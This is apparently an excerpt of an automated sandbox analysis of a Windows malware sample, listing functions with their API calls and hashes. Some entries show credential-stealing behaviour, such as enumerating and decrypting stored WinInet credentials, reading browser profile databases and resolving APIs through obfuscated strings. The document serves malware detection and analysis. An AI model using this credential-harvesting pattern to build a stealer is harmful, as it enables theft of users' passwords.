                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000000), ref: 004346DC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnvironmentVariable
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1431749950-0
                                                                                                                                                    • Opcode ID: 79eb50f735c42fe3247f2c044e27e0281c7edffe634ff9e365b370fb87441f60
                                                                                                                                                    • Instruction ID: 26a48d60194500ba980fcf915b22a38f88d81c5bb4018ff54f62093452c084b1
                                                                                                                                                    • Opcode Fuzzy Hash: 79eb50f735c42fe3247f2c044e27e0281c7edffe634ff9e365b370fb87441f60
                                                                                                                                                    • Instruction Fuzzy Hash: C301C434D043886ACF11DFB885564EEBBB5AB49204F10A1AEC4D6A6142E678538ECB55
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040BCA2, Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0040BCA7
                                                                                                                                                      • Part of subcall function 0040BBE2: __EH_prolog.LIBCMT ref: 0040BBE7
                                                                                                                                                      • Part of subcall function 0040BBE2: ___std_fs_directory_iterator_open@12.LIBCPMT ref: 0040BC52
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog$___std_fs_directory_iterator_open@12
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1512400408-0
                                                                                                                                                    • Opcode ID: 50121ceb6fe693b8d00fa30f8f133f48e6d435bd0d449d8b7c3e3e03b0bcb002
                                                                                                                                                    • Instruction ID: fe8cebe148ea73fc9585f99129e03fa8fc148abc887baabc58df5c53e7b0a88c
                                                                                                                                                    • Opcode Fuzzy Hash: 50121ceb6fe693b8d00fa30f8f133f48e6d435bd0d449d8b7c3e3e03b0bcb002
                                                                                                                                                    • Instruction Fuzzy Hash: CA01A1709047059FDB28CF69D4806ABBBF4FF04314F10462EE496A3380C7746A04CBA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004342E2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 004342E7
                                                                                                                                                      • Part of subcall function 004133AD: _Deallocate.LIBCONCRT ref: 004133BC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DeallocateH_prolog
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3708980276-0
                                                                                                                                                    • Opcode ID: 5a58c37f935f0d54ebe6837d964d96735ab5f755a2e47db30259c1b9a520f3c9
                                                                                                                                                    • Instruction ID: f80b414c9ffecb3878e566909ba457ab5101dab3509251568bec7030c120a435
                                                                                                                                                    • Opcode Fuzzy Hash: 5a58c37f935f0d54ebe6837d964d96735ab5f755a2e47db30259c1b9a520f3c9
                                                                                                                                                    • Instruction Fuzzy Hash: 9CF03672A001146BCB05EF99CD51AEFBB79EF88364F04422FF916E3281DB745D44C668
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00441C2B, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,0040A2CB,?,00000000,?,0040A2CB,?,0048309C,?,004193CE,00000000), ref: 00441C8B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 6842923-0
                                                                                                                                                    • Opcode ID: 6d4acc15e6dabdd8397e2d786e3651ed1907831d103516992a4f85bbc3069ed8
                                                                                                                                                    • Instruction ID: 60e7499a5056c13b69b6597baa1b4d932e3916f9b21f9cfd4c30d2c0d58ed362
                                                                                                                                                    • Opcode Fuzzy Hash: 6d4acc15e6dabdd8397e2d786e3651ed1907831d103516992a4f85bbc3069ed8
                                                                                                                                                    • Instruction Fuzzy Hash: B601A235A00309ABD7019F58D884BAEBBB8FF85710F15415AED15AB3A0E7B0AD81CBD0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00412EC1, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00412EC6
                                                                                                                                                      • Part of subcall function 004141C3: __EH_prolog.LIBCMT ref: 004141C8
                                                                                                                                                      • Part of subcall function 004141C3: std::_Lockit::_Lockit.LIBCPMT ref: 004141D6
                                                                                                                                                      • Part of subcall function 004141C3: int.LIBCPMT ref: 004141ED
                                                                                                                                                      • Part of subcall function 004141C3: std::_Lockit::~_Lockit.LIBCPMT ref: 0041423D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prologLockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1350124489-0
                                                                                                                                                    • Opcode ID: 5c93eef5f379a0898fa3177fcdc5e09d2582e9988b15ffc8c9c751f6c3c6a502
                                                                                                                                                    • Instruction ID: 6dcd6c242ec831d3224e6ab6dc06cb73c16f1c936296ef646fd4a47864eb9c2c
                                                                                                                                                    • Opcode Fuzzy Hash: 5c93eef5f379a0898fa3177fcdc5e09d2582e9988b15ffc8c9c751f6c3c6a502
                                                                                                                                                    • Instruction Fuzzy Hash: 2F01AD71A10114AFCB05EB65CA06BEE73F8EB08308F00402EB405E6291DBF8EE51CB5A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00462E93, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                    • Opcode ID: 704f85f526f2459d157d4fc2bcf278cc66d6983b8b7ec1b2a0209335287ab77c
                                                                                                                                                    • Instruction ID: dfd9410157825b93ea17dc60bb920a36e7f07106cf44d2b185ffe19ba6ff4a85
                                                                                                                                                    • Opcode Fuzzy Hash: 704f85f526f2459d157d4fc2bcf278cc66d6983b8b7ec1b2a0209335287ab77c
                                                                                                                                                    • Instruction Fuzzy Hash: 9B012172C00159BFCF01AFE9CD019EF7FB5AB08314F144166BD24A2192E6768A249B95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00412F77, Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Deallocate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1075933841-0
                                                                                                                                                    • Opcode ID: 5bbccaf4f7aa6a90a4b370b4ea190e4abcc86fb5e4a2490a10eb03a107548adc
                                                                                                                                                    • Instruction ID: 621da25352e803b564311db741a8f240aa0952c3194216c1c733359e8ce47edd
                                                                                                                                                    • Opcode Fuzzy Hash: 5bbccaf4f7aa6a90a4b370b4ea190e4abcc86fb5e4a2490a10eb03a107548adc
                                                                                                                                                    • Instruction Fuzzy Hash: 6E019E74209B008FC329CF28D180952B7F1FF8E3203118A9EE88A8BB64C770B841CF58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0043EC6B, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0040A2D5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: std::exception::exception
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2807920213-0
                                                                                                                                                    • Opcode ID: af869f578f94a2362e947ee61a59db1903e7b051969a0e438b499dcb535d7e51
                                                                                                                                                    • Instruction ID: 258f4fa07d3f6e7f3144c5790a202ff415db5779e750fda40f1648ed9eda40c5
                                                                                                                                                    • Opcode Fuzzy Hash: af869f578f94a2362e947ee61a59db1903e7b051969a0e438b499dcb535d7e51
                                                                                                                                                    • Instruction Fuzzy Hash: 01F0B43140030DB7CB14BAA6ED099AE7B6C8E01364F10457BB918A62D1EB7DD96286DE
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00456F7D, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00455DE3,00000001,00000364,00000008,000000FF,?,?,0043FE6B,?,?,00000000), ref: 00456FBE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                    • Opcode ID: bb47e03cc4d847678386ec644dcf8eba8a1ede18830a0e2e48d218af2dafd824
                                                                                                                                                    • Instruction ID: a6e19ab12171bd3f551e880bbc99c56fd8c22c592f5b4fbccd4e9cfad444c2e5
                                                                                                                                                    • Opcode Fuzzy Hash: bb47e03cc4d847678386ec644dcf8eba8a1ede18830a0e2e48d218af2dafd824
                                                                                                                                                    • Instruction Fuzzy Hash: 88F02B3390812067EB205E22AC04A5B3748AF41766B574027EC14D7292CE6CE80842FD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004587A6, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,0043FE6B,?,?,00000000,?,?,0040A242,?,?,?,?,0040A2DA), ref: 004587D8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                    • Opcode ID: cd6b608067ef725f5084c15780645f1f0ec8c24a837a09d14b06909ed3f800a7
                                                                                                                                                    • Instruction ID: 66db4494f01fcd272b33cb02daa21de787678e72f97be17c37ec9145e4cb615d
                                                                                                                                                    • Opcode Fuzzy Hash: cd6b608067ef725f5084c15780645f1f0ec8c24a837a09d14b06909ed3f800a7
                                                                                                                                                    • Instruction Fuzzy Hash: 23E0E531141A2097EA2136724C04B5B7B489B457A6F36012FFC50B2283DFACCC0482FE
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00415111, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                    • Opcode ID: 64f014318b0c0625eafebb7aefc1fb9d69e15525f88067e0030f8590bd1ce3ef
                                                                                                                                                    • Instruction ID: b638133b9fd57ca6073ea7361846afbe7acf5e6a1b9d865e8051474bbcdff52e
                                                                                                                                                    • Opcode Fuzzy Hash: 64f014318b0c0625eafebb7aefc1fb9d69e15525f88067e0030f8590bd1ce3ef
                                                                                                                                                    • Instruction Fuzzy Hash: E3F03AB1A00205AFC704DF5AD48099AFBB8FF58359B50057FA405D7701D774EA45CBE4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040B879, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog2.LIBCMT ref: 0040B880
                                                                                                                                                      • Part of subcall function 0040B4D4: __EH_prolog.LIBCMT ref: 0040B4D9
                                                                                                                                                      • Part of subcall function 00441C2B: KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,0040A2CB,?,00000000,?,0040A2CB,?,0048309C,?,004193CE,00000000), ref: 00441C8B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DispatcherExceptionH_prologH_prolog2User
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3749479025-0
                                                                                                                                                    • Opcode ID: f973b75ee16945eda537e32dd03d89d8bcb326dcf93e6d9865aa8edeef9ed000
                                                                                                                                                    • Instruction ID: 627cd5e5eae6b6f17e5065740c6bc9f706d5af836beff7f9cbc68aacefe10e22
                                                                                                                                                    • Opcode Fuzzy Hash: f973b75ee16945eda537e32dd03d89d8bcb326dcf93e6d9865aa8edeef9ed000
                                                                                                                                                    • Instruction Fuzzy Hash: 98F05E32800108ABDF14EBA1CD85EDEFB78AF15314F01806FB205731A2EB789A48CB64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0043DEE6, Relevance: 1.5, APIs: 1, Instructions: 19windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FormatMessageA.KERNEL32(00001300,00000000,?,00000000,?,00000000,00000000), ref: 0043DEFC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FormatMessage
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1306739567-0
                                                                                                                                                    • Opcode ID: d99b280f5c9b05999e3e7fae404106b2a80a4febf96f1660e7f851f221cc2032
                                                                                                                                                    • Instruction ID: e3bd4d0f07ec54d82a3db903b61802f0cabe006478adbc93b9f50aa06d65d420
                                                                                                                                                    • Opcode Fuzzy Hash: d99b280f5c9b05999e3e7fae404106b2a80a4febf96f1660e7f851f221cc2032
                                                                                                                                                    • Instruction Fuzzy Hash: CAD0C9B2100118BFFB012B95AC05CFBBF9CEF197A2B008026FE44CA021D6B25D5097F5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004133AD, Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Deallocate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1075933841-0
                                                                                                                                                    • Opcode ID: 46f0b83695a9492bb95b05a7919da8e84613df1fcc565f3d8521afe96858ca67
                                                                                                                                                    • Instruction ID: 3abc28bf9a3f06e0b95339e0abb912dd176fed971b8e9dd3be2967005930c215
                                                                                                                                                    • Opcode Fuzzy Hash: 46f0b83695a9492bb95b05a7919da8e84613df1fcc565f3d8521afe96858ca67
                                                                                                                                                    • Instruction Fuzzy Hash: F2D05E310142008FF3345E18F0017A277E5EB01725F20090EE4D186591CBA95DC44699
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00462BDA, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNEL32(00000000,00000000,?,00462FCA,?,?,00000000,?,00462FCA,00000000,0000000C), ref: 00462BF7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                    • Opcode ID: d2488a66301e42eda46e9ec6e1706de9391c8ad32ed0ee4fc7e49ffa98582ccc
                                                                                                                                                    • Instruction ID: a16912e228e90c2b9b1f2b2b747987b7a3d086e6db802f67365532e0b846e409
                                                                                                                                                    • Opcode Fuzzy Hash: d2488a66301e42eda46e9ec6e1706de9391c8ad32ed0ee4fc7e49ffa98582ccc
                                                                                                                                                    • Instruction Fuzzy Hash: 6ED06C3200010DBBDF028F84DC06EDA3BAAFB48714F114050FA5896020C772E861AB95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004347F7, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 00434812
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: NameUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2645101109-0
                                                                                                                                                    • Opcode ID: 524a02fd4bbfe3bd2d60a9febb9e66e03a8203d3c47675864d9cae48ca0374a4
                                                                                                                                                    • Instruction ID: 07659ce449d9464499dab673765915b2fd8b7ee85a88b45f2e66e318d8b02d89
                                                                                                                                                    • Opcode Fuzzy Hash: 524a02fd4bbfe3bd2d60a9febb9e66e03a8203d3c47675864d9cae48ca0374a4
                                                                                                                                                    • Instruction Fuzzy Hash: 7AD0C97480810DEBCF50DB90D949ACAB7BCEB00308F0004A294D1E3140FBF4ABC99B91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004443B8, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 004443CB
                                                                                                                                                      • Part of subcall function 00456A53: RtlFreeHeap.NTDLL(00000000,00000000,?,0046019E,?,00000000,?,?,?,00460441,?,00000007,?,?,00460842,?), ref: 00456A69
                                                                                                                                                      • Part of subcall function 00456A53: GetLastError.KERNEL32(?,?,0046019E,?,00000000,?,?,?,00460441,?,00000007,?,?,00460842,?,?), ref: 00456A7B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorFreeHeapLast_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1353095263-0
                                                                                                                                                    • Opcode ID: b092e381983b251eec72edd7ce996d447635a7e9f128971f1f33c75d07583572
                                                                                                                                                    • Instruction ID: cff7e86f0ece3099cabceb65105e70903c6536b3e088242b3371fc61a455a9fb
                                                                                                                                                    • Opcode Fuzzy Hash: b092e381983b251eec72edd7ce996d447635a7e9f128971f1f33c75d07583572
                                                                                                                                                    • Instruction Fuzzy Hash: 7AC08C31000208BBCF00DB42D806A4EBBA9DB80368F208048F81427241DAB1EF049680
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0042801A, Relevance: 1.3, APIs: 1, Instructions: 18COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00428029
                                                                                                                                                      • Part of subcall function 004279D5: CoCreateInstance.OLE32(0046BCB0,00000000,00000015,0046BCD0,?), ref: 004279F5
                                                                                                                                                      • Part of subcall function 004278E1: lstrlenW.KERNEL32(?), ref: 00427907
                                                                                                                                                      • Part of subcall function 004278E1: lstrlenW.KERNEL32(00000002), ref: 00427918
                                                                                                                                                      • Part of subcall function 004278E1: CredEnumerateW.SECHOST(Microsoft_WinInet_*,00000000,00000000,?), ref: 00427941
                                                                                                                                                      • Part of subcall function 004278E1: CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000001,?), ref: 00427987
                                                                                                                                                      • Part of subcall function 004278E1: LocalFree.KERNEL32(?), ref: 004279B1
                                                                                                                                                      • Part of subcall function 004278E1: CredFree.ADVAPI32(?), ref: 004279CA
                                                                                                                                                      • Part of subcall function 00427AAA: GetVersionExW.KERNEL32(?), ref: 00427AF2
                                                                                                                                                      • Part of subcall function 00427AAA: LoadLibraryA.KERNEL32(?), ref: 00427B46
                                                                                                                                                      • Part of subcall function 00427AAA: GetProcAddress.KERNEL32(00000000,?), ref: 00427B93
                                                                                                                                                      • Part of subcall function 00427AAA: GetProcAddress.KERNEL32(00000000,?), ref: 00427BCF
                                                                                                                                                      • Part of subcall function 00427AAA: GetProcAddress.KERNEL32(00000000,?), ref: 00427C0F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$CredFreelstrlen$CreateCryptDataEnumerateInitializeInstanceLibraryLoadLocalUnprotectVersion
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1367598280-0
                                                                                                                                                    • Opcode ID: 48f24d5061991bdcc7c1ee3be39415e91e66ed85a01dbfc82600d809d779a946
                                                                                                                                                    • Instruction ID: 8af29e6de5fe79eab8a53ce804b9ea46e701c81fa91bea544ed8ceab84e40519
                                                                                                                                                    • Opcode Fuzzy Hash: 48f24d5061991bdcc7c1ee3be39415e91e66ed85a01dbfc82600d809d779a946
                                                                                                                                                    • Instruction Fuzzy Hash: ABE08C3021C3146FD204EB10DD1BB6AB3E8EB80B29F80861DF889421D0AF74AD00E74A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 004103F7, Relevance: 33.7, APIs: 9, Strings: 10, Instructions: 457libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 004103FC
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 00410449
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0041047D
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 004104BA
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 004104F4
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 00410527
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0041055A
                                                                                                                                                    • GetProcAddress.KERNEL32(?,120F0D7E), ref: 0041059A
                                                                                                                                                    • wsprintfA.USER32 ref: 004105FF
                                                                                                                                                      • Part of subcall function 00412FD4: __EH_prolog.LIBCMT ref: 00412FD9
                                                                                                                                                      • Part of subcall function 004133AD: _Deallocate.LIBCONCRT ref: 004133BC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$H_prolog$Deallocatewsprintf
                                                                                                                                                    • String ID: !$&$*0$4)8n$RC^R$YC$].,1$r' >$shr<$ybo~
                                                                                                                                                    • API String ID: 2481562641-42985007
                                                                                                                                                    • Opcode ID: 932f33bc21ab435f4e0e2f6df84e520d17a62b993c94ce3e631aec53dd978362
                                                                                                                                                    • Instruction ID: 6b41ec1d212bf808ae3eb0a2b2a3040b7d21b3252c34da2a15c479638258261c
                                                                                                                                                    • Opcode Fuzzy Hash: 932f33bc21ab435f4e0e2f6df84e520d17a62b993c94ce3e631aec53dd978362
                                                                                                                                                    • Instruction Fuzzy Hash: 8012EF30D0429C9BDF15DFA8D8906EDBBB1BF19304F0041AEE84567262EB781BC9CB59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004185E7, Relevance: 14.6, APIs: 2, Strings: 6, Instructions: 610COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 004185EC
                                                                                                                                                      • Part of subcall function 00434721: __EH_prolog.LIBCMT ref: 00434726
                                                                                                                                                      • Part of subcall function 00434721: GetLogicalDriveStringsA.KERNEL32 ref: 00434773
                                                                                                                                                    • GetDriveTypeA.KERNEL32(?,?,?), ref: 004186C5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DriveH_prolog$LogicalStringsType
                                                                                                                                                    • String ID: %iedlcm$ $ $0sU$H;;.&$n
                                                                                                                                                    • API String ID: 970950249-452416305
                                                                                                                                                    • Opcode ID: 1ce15ec67507b6f32cfc0799fbb38e1dcc507d7b1cc77fea2924a7e50e60593a
                                                                                                                                                    • Instruction ID: 83ebd68deb4d634e9e5a637ad1eee63c6dd95697f4de04f6014c5161fa71fadf
                                                                                                                                                    • Opcode Fuzzy Hash: 1ce15ec67507b6f32cfc0799fbb38e1dcc507d7b1cc77fea2924a7e50e60593a
                                                                                                                                                    • Instruction Fuzzy Hash: 88428A71D00348CADF15DFA4C895BEEBBB4AF15308F14809ED41A77282DB785B89CB99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0042035B, Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 614COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00420360
                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000001,00000000), ref: 0042038C
                                                                                                                                                      • Part of subcall function 004341EF: __EH_prolog.LIBCMT ref: 004341F4
                                                                                                                                                      • Part of subcall function 004341EF: _strcat.LIBCMT ref: 0043424F
                                                                                                                                                      • Part of subcall function 0040BE6B: __EH_prolog.LIBCMT ref: 0040BE70
                                                                                                                                                      • Part of subcall function 004131CF: _Deallocate.LIBCONCRT ref: 004131E4
                                                                                                                                                      • Part of subcall function 004133AD: _Deallocate.LIBCONCRT ref: 004133BC
                                                                                                                                                    • sqlite3_finalize.NSS3(?), ref: 00420B82
                                                                                                                                                    • sqlite3_close.NSS3(?), ref: 00420B8F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog$Deallocate$FolderPath_strcatsqlite3_closesqlite3_finalize
                                                                                                                                                    • String ID: 0sU$6$Profiles
                                                                                                                                                    • API String ID: 1363784328-1113253295
